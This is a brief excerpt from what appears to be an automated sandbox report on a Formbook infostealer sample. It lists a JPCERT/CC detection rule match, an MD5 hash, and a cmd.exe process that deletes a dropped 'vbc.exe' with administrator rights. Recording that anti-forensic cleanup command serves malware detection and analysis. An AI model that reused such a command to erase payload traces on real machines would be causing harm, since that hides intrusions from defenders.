                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                              Reputation:high

                              General

                               Start time: 11:28:11
                               Start date: 20/11/2020
                               Path: C:\Windows\SysWOW64\cmd.exe
                               Wow64 process (32bit): true
                               Commandline: /c del 'C:\Users\Public\vbc.exe'
                               Imagebase: 0x4a550000
                               File size: 302592 bytes
                               MD5 hash: AD7B9C14083B52BC532FBA5948342B98
                               Has elevated privileges: true
                               Has administrator privileges: true
                               Programmed in: C, C++ or other language
                               Reputation: high

                              Disassembly

                              Code Analysis
